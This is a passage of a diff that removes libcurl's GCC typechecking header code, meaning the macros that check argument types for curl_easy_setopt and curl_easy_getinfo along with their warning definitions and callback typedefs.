-      if(!_curl_is_off_t(value))                                              \
-        _curl_easy_setopt_err_curl_off_t();                                   \
-    if(_curl_is_string_option(_curl_opt))                                     \
-      if(!_curl_is_string(value))                                             \
-        _curl_easy_setopt_err_string();                                       \
-    if(_curl_is_write_cb_option(_curl_opt))                                   \
-      if(!_curl_is_write_cb(value))                                           \
-        _curl_easy_setopt_err_write_callback();                               \
-    if((_curl_opt) == CURLOPT_RESOLVER_START_FUNCTION)                        \
-      if(!_curl_is_resolver_start_callback(value))                            \
-        _curl_easy_setopt_err_resolver_start_callback();                      \
-    if((_curl_opt) == CURLOPT_READFUNCTION)                                   \
-      if(!_curl_is_read_cb(value))                                            \
-        _curl_easy_setopt_err_read_cb();                                      \
-    if((_curl_opt) == CURLOPT_IOCTLFUNCTION)                                  \
-      if(!_curl_is_ioctl_cb(value))                                           \
-        _curl_easy_setopt_err_ioctl_cb();                                     \
-    if((_curl_opt) == CURLOPT_SOCKOPTFUNCTION)                                \
-      if(!_curl_is_sockopt_cb(value))                                         \
-        _curl_easy_setopt_err_sockopt_cb();                                   \
-    if((_curl_opt) == CURLOPT_OPENSOCKETFUNCTION)                             \
-      if(!_curl_is_opensocket_cb(value))                                      \
-        _curl_easy_setopt_err_opensocket_cb();                                \
-    if((_curl_opt) == CURLOPT_PROGRESSFUNCTION)                               \
-      if(!_curl_is_progress_cb(value))                                        \
-        _curl_easy_setopt_err_progress_cb();                                  \
-    if((_curl_opt) == CURLOPT_DEBUGFUNCTION)                                  \
-      if(!_curl_is_debug_cb(value))                                           \
-        _curl_easy_setopt_err_debug_cb();                                     \
-    if((_curl_opt) == CURLOPT_SSL_CTX_FUNCTION)                               \
-      if(!_curl_is_ssl_ctx_cb(value))                                         \
-        _curl_easy_setopt_err_ssl_ctx_cb();                                   \
-    if(_curl_is_conv_cb_option(_curl_opt))                                    \
-      if(!_curl_is_conv_cb(value))                                            \
-        _curl_easy_setopt_err_conv_cb();                                      \
-    if((_curl_opt) == CURLOPT_SEEKFUNCTION)                                   \
-      if(!_curl_is_seek_cb(value))                                            \
-        _curl_easy_setopt_err_seek_cb();                                      \
-    if(_curl_is_cb_data_option(_curl_opt))                                    \
-      if(!_curl_is_cb_data(value))                                            \
-        _curl_easy_setopt_err_cb_data();                                      \
-    if((_curl_opt) == CURLOPT_ERRORBUFFER)                                    \
-      if(!_curl_is_error_buffer(value))                                       \
-        _curl_easy_setopt_err_error_buffer();                                 \
-    if((_curl_opt) == CURLOPT_STDERR)                                         \
-      if(!_curl_is_FILE(value))                                               \
-        _curl_easy_setopt_err_FILE();                                         \
-    if(_curl_is_postfields_option(_curl_opt))                                 \
-      if(!_curl_is_postfields(value))                                         \
-        _curl_easy_setopt_err_postfields();                                   \
-    if((_curl_opt) == CURLOPT_HTTPPOST)                                       \
-      if(!_curl_is_arr((value), struct curl_httppost))                        \
-        _curl_easy_setopt_err_curl_httpost();                                 \
-    if((_curl_opt) == CURLOPT_MIMEPOST)                                       \
-      if(!_curl_is_ptr((value), curl_mime))                                   \
-        _curl_easy_setopt_err_curl_mimepost();                                \
-    if(_curl_is_slist_option(_curl_opt))                                      \
-      if(!_curl_is_arr((value), struct curl_slist))                           \
-        _curl_easy_setopt_err_curl_slist();                                   \
-    if((_curl_opt) == CURLOPT_SHARE)                                          \
-      if(!_curl_is_ptr((value), CURLSH))                                      \
-        _curl_easy_setopt_err_CURLSH();                                       \
-  }                                                                           \
-  curl_easy_setopt(handle, _curl_opt, value);                                 \
-})
-
-/* wraps curl_easy_getinfo() with typechecking */
-/* FIXME: don't allow const pointers */
-#define curl_easy_getinfo(handle, info, arg)                                  \
-__extension__ ({                                                              \
-  __typeof__(info) _curl_info = info;                                         \
-  if(__builtin_constant_p(_curl_info)) {                                      \
-    if(_curl_is_string_info(_curl_info))                                      \
-      if(!_curl_is_arr((arg), char *))                                        \
-        _curl_easy_getinfo_err_string();                                      \
-    if(_curl_is_long_info(_curl_info))                                        \
-      if(!_curl_is_arr((arg), long))                                          \
-        _curl_easy_getinfo_err_long();                                        \
-    if(_curl_is_double_info(_curl_info))                                      \
-      if(!_curl_is_arr((arg), double))                                        \
-        _curl_easy_getinfo_err_double();                                      \
-    if(_curl_is_slist_info(_curl_info))                                       \
-      if(!_curl_is_arr((arg), struct curl_slist *))                           \
-        _curl_easy_getinfo_err_curl_slist();                                  \
-    if(_curl_is_tlssessioninfo_info(_curl_info))                              \
-      if(!_curl_is_arr((arg), struct curl_tlssessioninfo *))                  \
-        _curl_easy_getinfo_err_curl_tlssesssioninfo();                        \
-    if(_curl_is_certinfo_info(_curl_info))                                    \
-      if(!_curl_is_arr((arg), struct curl_certinfo *))                        \
-        _curl_easy_getinfo_err_curl_certinfo();                               \
-    if(_curl_is_socket_info(_curl_info))                                      \
-      if(!_curl_is_arr((arg), curl_socket_t))                                 \
-        _curl_easy_getinfo_err_curl_socket();                                 \
-    if(_curl_is_off_t_info(_curl_info))                                       \
-      if(!_curl_is_arr((arg), curl_off_t))                                    \
-        _curl_easy_getinfo_err_curl_off_t();                                  \
-  }                                                                           \
-  curl_easy_getinfo(handle, _curl_info, arg);                                 \
-})
-
-/* TODO: typechecking for curl_share_setopt() and curl_multi_setopt(),
- * for now just make sure that the functions are called with three
- * arguments
- */
-#define curl_share_setopt(share,opt,param) curl_share_setopt(share,opt,param)
-#define curl_multi_setopt(handle,opt,param) curl_multi_setopt(handle,opt,param)
-
-
-/* the actual warnings, triggered by calling the _curl_easy_setopt_err*
- * functions */
-
-/* To define a new warning, use _CURL_WARNING(identifier, "message") */
-#define _CURL_WARNING(id, message)                                            \
-  static void __attribute__((__warning__(message)))                           \
-  __attribute__((__unused__)) __attribute__((__noinline__))                   \
-  id(void) { __asm__(""); }
-
-_CURL_WARNING(_curl_easy_setopt_err_long,
-  "curl_easy_setopt expects a long argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_curl_off_t,
-  "curl_easy_setopt expects a curl_off_t argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_string,
-              "curl_easy_setopt expects a "
-              "string ('char *' or char[]) argument for this option"
-  )
-_CURL_WARNING(_curl_easy_setopt_err_write_callback,
-  "curl_easy_setopt expects a curl_write_callback argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_resolver_start_callback,
-              "curl_easy_setopt expects a "
-              "curl_resolver_start_callback argument for this option"
-  )
-_CURL_WARNING(_curl_easy_setopt_err_read_cb,
-  "curl_easy_setopt expects a curl_read_callback argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_ioctl_cb,
-  "curl_easy_setopt expects a curl_ioctl_callback argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_sockopt_cb,
-  "curl_easy_setopt expects a curl_sockopt_callback argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_opensocket_cb,
-              "curl_easy_setopt expects a "
-              "curl_opensocket_callback argument for this option"
-  )
-_CURL_WARNING(_curl_easy_setopt_err_progress_cb,
-  "curl_easy_setopt expects a curl_progress_callback argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_debug_cb,
-  "curl_easy_setopt expects a curl_debug_callback argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_ssl_ctx_cb,
-  "curl_easy_setopt expects a curl_ssl_ctx_callback argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_conv_cb,
-  "curl_easy_setopt expects a curl_conv_callback argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_seek_cb,
-  "curl_easy_setopt expects a curl_seek_callback argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_cb_data,
-              "curl_easy_setopt expects a "
-              "private data pointer as argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_error_buffer,
-              "curl_easy_setopt expects a "
-              "char buffer of CURL_ERROR_SIZE as argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_FILE,
-  "curl_easy_setopt expects a 'FILE *' argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_postfields,
-  "curl_easy_setopt expects a 'void *' or 'char *' argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_curl_httpost,
-              "curl_easy_setopt expects a 'struct curl_httppost *' "
-              "argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_curl_mimepost,
-              "curl_easy_setopt expects a 'curl_mime *' "
-              "argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_curl_slist,
-  "curl_easy_setopt expects a 'struct curl_slist *' argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_CURLSH,
-  "curl_easy_setopt expects a CURLSH* argument for this option")
-
-_CURL_WARNING(_curl_easy_getinfo_err_string,
-  "curl_easy_getinfo expects a pointer to 'char *' for this info")
-_CURL_WARNING(_curl_easy_getinfo_err_long,
-  "curl_easy_getinfo expects a pointer to long for this info")
-_CURL_WARNING(_curl_easy_getinfo_err_double,
-  "curl_easy_getinfo expects a pointer to double for this info")
-_CURL_WARNING(_curl_easy_getinfo_err_curl_slist,
-  "curl_easy_getinfo expects a pointer to 'struct curl_slist *' for this info")
-_CURL_WARNING(_curl_easy_getinfo_err_curl_tlssesssioninfo,
-              "curl_easy_getinfo expects a pointer to "
-              "'struct curl_tlssessioninfo *' for this info")
-_CURL_WARNING(_curl_easy_getinfo_err_curl_certinfo,
-              "curl_easy_getinfo expects a pointer to "
-              "'struct curl_certinfo *' for this info")
-_CURL_WARNING(_curl_easy_getinfo_err_curl_socket,
-  "curl_easy_getinfo expects a pointer to curl_socket_t for this info")
-_CURL_WARNING(_curl_easy_getinfo_err_curl_off_t,
-  "curl_easy_getinfo expects a pointer to curl_off_t for this info")
-
-/* groups of curl_easy_setops options that take the same type of argument */
-
-/* To add a new option to one of the groups, just add
- *   (option) == CURLOPT_SOMETHING
- * to the or-expression. If the option takes a long or curl_off_t, you don't
- * have to do anything
- */
-
-/* evaluates to true if option takes a long argument */
-#define _curl_is_long_option(option)                                          \
-  (0 < (option) && (option) < CURLOPTTYPE_OBJECTPOINT)
-
-#define _curl_is_off_t_option(option)                                         \
-  ((option) > CURLOPTTYPE_OFF_T)
-
-/* evaluates to true if option takes a char* argument */
-#define _curl_is_string_option(option)                                        \
-  ((option) == CURLOPT_ABSTRACT_UNIX_SOCKET ||                                \
-   (option) == CURLOPT_ACCEPT_ENCODING ||                                     \
-   (option) == CURLOPT_CAINFO ||                                              \
-   (option) == CURLOPT_CAPATH ||                                              \
-   (option) == CURLOPT_COOKIE ||                                              \
-   (option) == CURLOPT_COOKIEFILE ||                                          \
-   (option) == CURLOPT_COOKIEJAR ||                                           \
-   (option) == CURLOPT_COOKIELIST ||                                          \
-   (option) == CURLOPT_CRLFILE ||                                             \
-   (option) == CURLOPT_CUSTOMREQUEST ||                                       \
-   (option) == CURLOPT_DEFAULT_PROTOCOL ||                                    \
-   (option) == CURLOPT_DNS_INTERFACE ||                                       \
-   (option) == CURLOPT_DNS_LOCAL_IP4 ||                                       \
-   (option) == CURLOPT_DNS_LOCAL_IP6 ||                                       \
-   (option) == CURLOPT_DNS_SERVERS ||                                         \
-   (option) == CURLOPT_EGDSOCKET ||                                           \
-   (option) == CURLOPT_FTPPORT ||                                             \
-   (option) == CURLOPT_FTP_ACCOUNT ||                                         \
-   (option) == CURLOPT_FTP_ALTERNATIVE_TO_USER ||                             \
-   (option) == CURLOPT_INTERFACE ||                                           \
-   (option) == CURLOPT_ISSUERCERT ||                                          \
-   (option) == CURLOPT_KEYPASSWD ||                                           \
-   (option) == CURLOPT_KRBLEVEL ||                                            \
-   (option) == CURLOPT_LOGIN_OPTIONS ||                                       \
-   (option) == CURLOPT_MAIL_AUTH ||                                           \
-   (option) == CURLOPT_MAIL_FROM ||                                           \
-   (option) == CURLOPT_NETRC_FILE ||                                          \
-   (option) == CURLOPT_NOPROXY ||                                             \
-   (option) == CURLOPT_PASSWORD ||                                            \
-   (option) == CURLOPT_PINNEDPUBLICKEY ||                                     \
-   (option) == CURLOPT_PRE_PROXY ||                                           \
-   (option) == CURLOPT_PROXY ||                                               \
-   (option) == CURLOPT_PROXYPASSWORD ||                                       \
-   (option) == CURLOPT_PROXYUSERNAME ||                                       \
-   (option) == CURLOPT_PROXYUSERPWD ||                                        \
-   (option) == CURLOPT_PROXY_CAINFO ||                                        \
-   (option) == CURLOPT_PROXY_CAPATH ||                                        \
-   (option) == CURLOPT_PROXY_CRLFILE ||                                       \
-   (option) == CURLOPT_PROXY_KEYPASSWD ||                                     \
-   (option) == CURLOPT_PROXY_PINNEDPUBLICKEY ||                               \
-   (option) == CURLOPT_PROXY_SERVICE_NAME ||                                  \
-   (option) == CURLOPT_PROXY_SSLCERT ||                                       \
-   (option) == CURLOPT_PROXY_SSLCERTTYPE ||                                   \
-   (option) == CURLOPT_PROXY_SSLKEY ||                                        \
-   (option) == CURLOPT_PROXY_SSLKEYTYPE ||                                    \
-   (option) == CURLOPT_PROXY_SSL_CIPHER_LIST ||                               \
-   (option) == CURLOPT_PROXY_TLSAUTH_PASSWORD ||                              \
-   (option) == CURLOPT_PROXY_TLSAUTH_USERNAME ||                              \
-   (option) == CURLOPT_PROXY_TLSAUTH_TYPE ||                                  \
-   (option) == CURLOPT_RANDOM_FILE ||                                         \
-   (option) == CURLOPT_RANGE ||                                               \
-   (option) == CURLOPT_REFERER ||                                             \
-   (option) == CURLOPT_RTSP_SESSION_ID ||                                     \
-   (option) == CURLOPT_RTSP_STREAM_URI ||                                     \
-   (option) == CURLOPT_RTSP_TRANSPORT ||                                      \
-   (option) == CURLOPT_SERVICE_NAME ||                                        \
-   (option) == CURLOPT_SOCKS5_GSSAPI_SERVICE ||                               \
-   (option) == CURLOPT_SSH_HOST_PUBLIC_KEY_MD5 ||                             \
-   (option) == CURLOPT_SSH_KNOWNHOSTS ||                                      \
-   (option) == CURLOPT_SSH_PRIVATE_KEYFILE ||                                 \
-   (option) == CURLOPT_SSH_PUBLIC_KEYFILE ||                                  \
-   (option) == CURLOPT_SSLCERT ||                                             \
-   (option) == CURLOPT_SSLCERTTYPE ||                                         \
-   (option) == CURLOPT_SSLENGINE ||                                           \
-   (option) == CURLOPT_SSLKEY ||                                              \
-   (option) == CURLOPT_SSLKEYTYPE ||                                          \
-   (option) == CURLOPT_SSL_CIPHER_LIST ||                                     \
-   (option) == CURLOPT_TLSAUTH_PASSWORD ||                                    \
-   (option) == CURLOPT_TLSAUTH_TYPE ||                                        \
-   (option) == CURLOPT_TLSAUTH_USERNAME ||                                    \
-   (option) == CURLOPT_UNIX_SOCKET_PATH ||                                    \
-   (option) == CURLOPT_URL ||                                                 \
-   (option) == CURLOPT_USERAGENT ||                                           \
-   (option) == CURLOPT_USERNAME ||                                            \
-   (option) == CURLOPT_USERPWD ||                                             \
-   (option) == CURLOPT_XOAUTH2_BEARER ||                                      \
-   0)
-
-/* evaluates to true if option takes a curl_write_callback argument */
-#define _curl_is_write_cb_option(option)                                      \
-  ((option) == CURLOPT_HEADERFUNCTION ||                                      \
-   (option) == CURLOPT_WRITEFUNCTION)
-
-/* evaluates to true if option takes a curl_conv_callback argument */
-#define _curl_is_conv_cb_option(option)                                       \
-  ((option) == CURLOPT_CONV_TO_NETWORK_FUNCTION ||                            \
-   (option) == CURLOPT_CONV_FROM_NETWORK_FUNCTION ||                          \
-   (option) == CURLOPT_CONV_FROM_UTF8_FUNCTION)
-
-/* evaluates to true if option takes a data argument to pass to a callback */
-#define _curl_is_cb_data_option(option)                                       \
-  ((option) == CURLOPT_CHUNK_DATA ||                                          \
-   (option) == CURLOPT_CLOSESOCKETDATA ||                                     \
-   (option) == CURLOPT_DEBUGDATA ||                                           \
-   (option) == CURLOPT_FNMATCH_DATA ||                                        \
-   (option) == CURLOPT_HEADERDATA ||                                          \
-   (option) == CURLOPT_INTERLEAVEDATA ||                                      \
-   (option) == CURLOPT_IOCTLDATA ||                                           \
-   (option) == CURLOPT_OPENSOCKETDATA ||                                      \
-   (option) == CURLOPT_PRIVATE ||                                             \
-   (option) == CURLOPT_PROGRESSDATA ||                                        \
-   (option) == CURLOPT_READDATA ||                                            \
-   (option) == CURLOPT_SEEKDATA ||                                            \
-   (option) == CURLOPT_SOCKOPTDATA ||                                         \
-   (option) == CURLOPT_SSH_KEYDATA ||                                         \
-   (option) == CURLOPT_SSL_CTX_DATA ||                                        \
-   (option) == CURLOPT_WRITEDATA ||                                           \
-   (option) == CURLOPT_RESOLVER_START_DATA ||                                 \
-   0)
-
-/* evaluates to true if option takes a POST data argument (void* or char*) */
-#define _curl_is_postfields_option(option)                                    \
-  ((option) == CURLOPT_POSTFIELDS ||                                          \
-   (option) == CURLOPT_COPYPOSTFIELDS ||                                      \
-   0)
-
-/* evaluates to true if option takes a struct curl_slist * argument */
-#define _curl_is_slist_option(option)                                         \
-  ((option) == CURLOPT_HTTP200ALIASES ||                                      \
-   (option) == CURLOPT_HTTPHEADER ||                                          \
-   (option) == CURLOPT_MAIL_RCPT ||                                           \
-   (option) == CURLOPT_POSTQUOTE ||                                           \
-   (option) == CURLOPT_PREQUOTE ||                                            \
-   (option) == CURLOPT_PROXYHEADER ||                                         \
-   (option) == CURLOPT_QUOTE ||                                               \
-   (option) == CURLOPT_RESOLVE ||                                             \
-   (option) == CURLOPT_TELNETOPTIONS ||                                       \
-   0)
-
-/* groups of curl_easy_getinfo infos that take the same type of argument */
-
-/* evaluates to true if info expects a pointer to char * argument */
-#define _curl_is_string_info(info)                                            \
-  (CURLINFO_STRING < (info) && (info) < CURLINFO_LONG)
-
-/* evaluates to true if info expects a pointer to long argument */
-#define _curl_is_long_info(info)                                              \
-  (CURLINFO_LONG < (info) && (info) < CURLINFO_DOUBLE)
-
-/* evaluates to true if info expects a pointer to double argument */
-#define _curl_is_double_info(info)                                            \
-  (CURLINFO_DOUBLE < (info) && (info) < CURLINFO_SLIST)
-
-/* true if info expects a pointer to struct curl_slist * argument */
-#define _curl_is_slist_info(info)                                       \
-  (((info) == CURLINFO_SSL_ENGINES) || ((info) == CURLINFO_COOKIELIST))
-
-/* true if info expects a pointer to struct curl_tlssessioninfo * argument */
-#define _curl_is_tlssessioninfo_info(info)                              \
-  (((info) == CURLINFO_TLS_SSL_PTR) || ((info) == CURLINFO_TLS_SESSION))
-
-/* true if info expects a pointer to struct curl_certinfo * argument */
-#define _curl_is_certinfo_info(info) ((info) == CURLINFO_CERTINFO)
-
-/* true if info expects a pointer to struct curl_socket_t argument */
-#define _curl_is_socket_info(info)                                            \
-  (CURLINFO_SOCKET < (info) && (info) < CURLINFO_OFF_T)
-
-/* true if info expects a pointer to curl_off_t argument */
-#define _curl_is_off_t_info(info)                                             \
-  (CURLINFO_OFF_T < (info))
-
-
-/* typecheck helpers -- check whether given expression has requested type*/
-
-/* For pointers, you can use the _curl_is_ptr/_curl_is_arr macros,
- * otherwise define a new macro. Search for __builtin_types_compatible_p
- * in the GCC manual.
- * NOTE: these macros MUST NOT EVALUATE their arguments! The argument is
- * the actual expression passed to the curl_easy_setopt macro. This
- * means that you can only apply the sizeof and __typeof__ operators, no
- * == or whatsoever.
- */
-
-/* XXX: should evaluate to true iff expr is a pointer */
-#define _curl_is_any_ptr(expr)                                                \
-  (sizeof(expr) == sizeof(void *))
-
-/* evaluates to true if expr is NULL */
-/* XXX: must not evaluate expr, so this check is not accurate */
-#define _curl_is_NULL(expr)                                                   \
-  (__builtin_types_compatible_p(__typeof__(expr), __typeof__(NULL)))
-
-/* evaluates to true if expr is type*, const type* or NULL */
-#define _curl_is_ptr(expr, type)                                              \
-  (_curl_is_NULL(expr) ||                                                     \
-   __builtin_types_compatible_p(__typeof__(expr), type *) ||                  \
-   __builtin_types_compatible_p(__typeof__(expr), const type *))
-
-/* evaluates to true if expr is one of type[], type*, NULL or const type* */
-#define _curl_is_arr(expr, type)                                              \
-  (_curl_is_ptr((expr), type) ||                                              \
-   __builtin_types_compatible_p(__typeof__(expr), type []))
-
-/* evaluates to true if expr is a string */
-#define _curl_is_string(expr)                                                 \
-  (_curl_is_arr((expr), char) ||                                              \
-   _curl_is_arr((expr), signed char) ||                                       \
-   _curl_is_arr((expr), unsigned char))
-
-/* evaluates to true if expr is a long (no matter the signedness)
- * XXX: for now, int is also accepted (and therefore short and char, which
- * are promoted to int when passed to a variadic function) */
-#define _curl_is_long(expr)                                                   \
-  (__builtin_types_compatible_p(__typeof__(expr), long) ||                    \
-   __builtin_types_compatible_p(__typeof__(expr), signed long) ||             \
-   __builtin_types_compatible_p(__typeof__(expr), unsigned long) ||           \
-   __builtin_types_compatible_p(__typeof__(expr), int) ||                     \
-   __builtin_types_compatible_p(__typeof__(expr), signed int) ||              \
-   __builtin_types_compatible_p(__typeof__(expr), unsigned int) ||            \
-   __builtin_types_compatible_p(__typeof__(expr), short) ||                   \
-   __builtin_types_compatible_p(__typeof__(expr), signed short) ||            \
-   __builtin_types_compatible_p(__typeof__(expr), unsigned short) ||          \
-   __builtin_types_compatible_p(__typeof__(expr), char) ||                    \
-   __builtin_types_compatible_p(__typeof__(expr), signed char) ||             \
-   __builtin_types_compatible_p(__typeof__(expr), unsigned char))
-
-/* evaluates to true if expr is of type curl_off_t */
-#define _curl_is_off_t(expr)                                                  \
-  (__builtin_types_compatible_p(__typeof__(expr), curl_off_t))
-
-/* evaluates to true if expr is abuffer suitable for CURLOPT_ERRORBUFFER */
-/* XXX: also check size of an char[] array? */
-#define _curl_is_error_buffer(expr)                                           \
-  (_curl_is_NULL(expr) ||                                                     \
-   __builtin_types_compatible_p(__typeof__(expr), char *) ||                  \
-   __builtin_types_compatible_p(__typeof__(expr), char[]))
-
-/* evaluates to true if expr is of type (const) void* or (const) FILE* */
-#if 0
-#define _curl_is_cb_data(expr)                                                \
-  (_curl_is_ptr((expr), void) ||                                              \
-   _curl_is_ptr((expr), FILE))
-#else /* be less strict */
-#define _curl_is_cb_data(expr)                                                \
-  _curl_is_any_ptr(expr)
-#endif
-
-/* evaluates to true if expr is of type FILE* */
-#define _curl_is_FILE(expr)                                             \
-  (_curl_is_NULL(expr) ||                                              \
-   (__builtin_types_compatible_p(__typeof__(expr), FILE *)))
-
-/* evaluates to true if expr can be passed as POST data (void* or char*) */
-#define _curl_is_postfields(expr)                                             \
-  (_curl_is_ptr((expr), void) ||                                              \
-   _curl_is_arr((expr), char))
-
-/* FIXME: the whole callback checking is messy...
- * The idea is to tolerate char vs. void and const vs. not const
- * pointers in arguments at least
- */
-/* helper: __builtin_types_compatible_p distinguishes between functions and
- * function pointers, hide it */
-#define _curl_callback_compatible(func, type)                                 \
-  (__builtin_types_compatible_p(__typeof__(func), type) ||                    \
-   __builtin_types_compatible_p(__typeof__(func) *, type))
-
-/* evaluates to true if expr is of type curl_resolver_start_callback */
-#define _curl_is_resolver_start_callback(expr)       \
-  (_curl_is_NULL(expr) || \
-   _curl_callback_compatible((expr), curl_resolver_start_callback))
-
-/* evaluates to true if expr is of type curl_read_callback or "similar" */
-#define _curl_is_read_cb(expr)                                          \
-  (_curl_is_NULL(expr) ||                                                     \
-   _curl_callback_compatible((expr), __typeof__(fread) *) ||                  \
-   _curl_callback_compatible((expr), curl_read_callback) ||                   \
-   _curl_callback_compatible((expr), _curl_read_callback1) ||                 \
-   _curl_callback_compatible((expr), _curl_read_callback2) ||                 \
-   _curl_callback_compatible((expr), _curl_read_callback3) ||                 \
-   _curl_callback_compatible((expr), _curl_read_callback4) ||                 \
-   _curl_callback_compatible((expr), _curl_read_callback5) ||                 \
-   _curl_callback_compatible((expr), _curl_read_callback6))
-typedef size_t (*_curl_read_callback1)(char *, size_t, size_t, void *);
-typedef size_t (*_curl_read_callback2)(char *, size_t, size_t, const void *);
-typedef size_t (*_curl_read_callback3)(char *, size_t, size_t, FILE *);
-typedef size_t (*_curl_read_callback4)(void *, size_t, size_t, void *);
-typedef size_t (*_curl_read_callback5)(void *, size_t, size_t, const void *);
-typedef size_t (*_curl_read_callback6)(void *, size_t, size_t, FILE *);
-
-/* evaluates to true if expr is of type curl_write_callback or "similar" */
-#define _curl_is_write_cb(expr)                                               \
-  (_curl_is_read_cb(expr) ||                                            \
-   _curl_callback_compatible((expr), __typeof__(fwrite) *) ||                 \
-   _curl_callback_compatible((expr), curl_write_callback) ||                  \
-   _curl_callback_compatible((expr), _curl_write_callback1) ||                \
-   _curl_callback_compatible((expr), _curl_write_callback2) ||                \
-   _curl_callback_compatible((expr), _curl_write_callback3) ||                \
-   _curl_callback_compatible((expr), _curl_write_callback4) ||                \
-   _curl_callback_compatible((expr), _curl_write_callback5) ||                \
-   _curl_callback_compatible((expr), _curl_write_callback6))
-typedef size_t (*_curl_write_callback1)(const char *, size_t, size_t, void *);
-typedef size_t (*_curl_write_callback2)(const char *, size_t, size_t,
-                                       const void *);
-typedef size_t (*_curl_write_callback3)(const char *, size_t, size_t, FILE *);
-typedef size_t (*_curl_write_callback4)(const void *, size_t, size_t, void *);
-typedef size_t (*_curl_write_callback5)(const void *, size_t, size_t,
-                                       const void *);
-typedef size_t (*_curl_write_callback6)(const void *, size_t, size_t, FILE *);
-
-/* evaluates to true if expr is of type curl_ioctl_callback or "similar" */
-#define _curl_is_ioctl_cb(expr)                                         \
-  (_curl_is_NULL(expr) ||                                                     \
-   _curl_callback_compatible((expr), curl_ioctl_callback) ||                  \
-   _curl_callback_compatible((expr), _curl_ioctl_callback1) ||                \
-   _curl_callback_compatible((expr), _curl_ioctl_callback2) ||                \
-   _curl_callback_compatible((expr), _curl_ioctl_callback3) ||                \
-   _curl_callback_compatible((expr), _curl_ioctl_callback4))
-typedef curlioerr (*_curl_ioctl_callback1)(CURL *, int, void *);
-typedef curlioerr (*_curl_ioctl_callback2)(CURL *, int, const void *);
-typedef curlioerr (*_curl_ioctl_callback3)(CURL *, curliocmd, void *);
-typedef curlioerr (*_curl_ioctl_callback4)(CURL *, curliocmd, const void *);
-
-/* evaluates to true if expr is of type curl_sockopt_callback or "similar" */
-#define _curl_is_sockopt_cb(expr)                                       \
-  (_curl_is_NULL(expr) ||                                                     \
-   _curl_callback_compatible((expr), curl_sockopt_callback) ||                \
-   _curl_callback_compatible((expr), _curl_sockopt_callback1) ||              \
-   _curl_callback_compatible((expr), _curl_sockopt_callback2))
-typedef int (*_curl_sockopt_callback1)(void *, curl_socket_t, curlsocktype);
-typedef int (*_curl_sockopt_callback2)(const void *, curl_socket_t,
-                                      curlsocktype);
-
-/* evaluates to true if expr is of type curl_opensocket_callback or
-   "similar" */
-#define _curl_is_opensocket_cb(expr)                                    \
-  (_curl_is_NULL(expr) ||                                                     \
-   _curl_callback_compatible((expr), curl_opensocket_callback) ||             \
-   _curl_callback_compatible((expr), _curl_opensocket_callback1) ||           \
-   _curl_callback_compatible((expr), _curl_opensocket_callback2) ||           \
-   _curl_callback_compatible((expr), _curl_opensocket_callback3) ||           \
-   _curl_callback_compatible((expr), _curl_opensocket_callback4))
-typedef curl_socket_t (*_curl_opensocket_callback1)
-  (void *, curlsocktype, struct curl_sockaddr *);
-typedef curl_socket_t (*_curl_opensocket_callback2)
-  (void *, curlsocktype, const struct curl_sockaddr *);
-typedef curl_socket_t (*_curl_opensocket_callback3)
-  (const void *, curlsocktype, struct curl_sockaddr *);
-typedef curl_socket_t (*_curl_opensocket_callback4)
-  (const void *, curlsocktype, const struct curl_sockaddr *);
-
-/* evaluates to true if expr is of type curl_progress_callback or "similar" */
-#define _curl_is_progress_cb(expr)                                      \
-  (_curl_is_NULL(expr) ||                                                     \
-   _curl_callback_compatible((expr), curl_progress_callback) ||               \
-   _curl_callback_compatible((expr), _curl_progress_callback1) ||             \
-   _curl_callback_compatible((expr), _curl_progress_callback2))
-typedef int (*_curl_progress_callback1)(void *,
-    double, double, double, double);
-typedef int (*_curl_progress_callback2)(const void *,
-    double, double, double, double);
-
-/* evaluates to true if expr is of type curl_debug_callback or "similar" */
-#define _curl_is_debug_cb(expr)                                         \
-  (_curl_is_NULL(expr) ||                                                     \
-   _curl_callback_compatible((expr), curl_debug_callback) ||                  \
-   _curl_callback_compatible((expr), _curl_debug_callback1) ||                \
-   _curl_callback_compatible((expr), _curl_debug_callback2) ||                \
-   _curl_callback_compatible((expr), _curl_debug_callback3) ||                \
-   _curl_callback_compatible((expr), _curl_debug_callback4) ||                \
-   _curl_callback_compatible((expr), _curl_debug_callback5) ||                \
-   _curl_callback_compatible((expr), _curl_debug_callback6) ||                \
-   _curl_callback_compatible((expr), _curl_debug_callback7) ||                \
-   _curl_callback_compatible((expr), _curl_debug_callback8))
-typedef int (*_curl_debug_callback1) (CURL *,
-    curl_infotype, char *, size_t, void *);
-typedef int (*_curl_debug_callback2) (CURL *,
-    curl_infotype, char *, size_t, const void *);
-typedef int (*_curl_debug_callback3) (CURL *,
-    curl_infotype, const char *, size_t, void *);
-typedef int (*_curl_debug_callback4) (CURL *,
-    curl_infotype, const char *, size_t, const void *);
-typedef int (*_curl_debug_callback5) (CURL *,
-    curl_infotype, unsigned char *, size_t, void *);
-typedef int (*_curl_debug_callback6) (CURL *,
-    curl_infotype, unsigned char *, size_t, const void *);
-typedef int (*_curl_debug_callback7) (CURL *,
-    curl_infotype, const unsigned char *, size_t, void *);
-typedef int (*_curl_debug_callback8) (CURL *,
-    curl_infotype, const unsigned char *, size_t, const void *);
-
-/* evaluates to true if expr is of type curl_ssl_ctx_callback or "similar" */
-/* this is getting even messier... */
-#define _curl_is_ssl_ctx_cb(expr)                                       \
-  (_curl_is_NULL(expr) ||                                                     \
-   _curl_callback_compatible((expr), curl_ssl_ctx_callback) ||                \
-   _curl_callback_compatible((expr), _curl_ssl_ctx_callback1) ||              \
-   _curl_callback_compatible((expr), _curl_ssl_ctx_callback2) ||              \
-   _curl_callback_compatible((expr), _curl_ssl_ctx_callback3) ||              \
-   _curl_callback_compatible((expr), _curl_ssl_ctx_callback4) ||              \
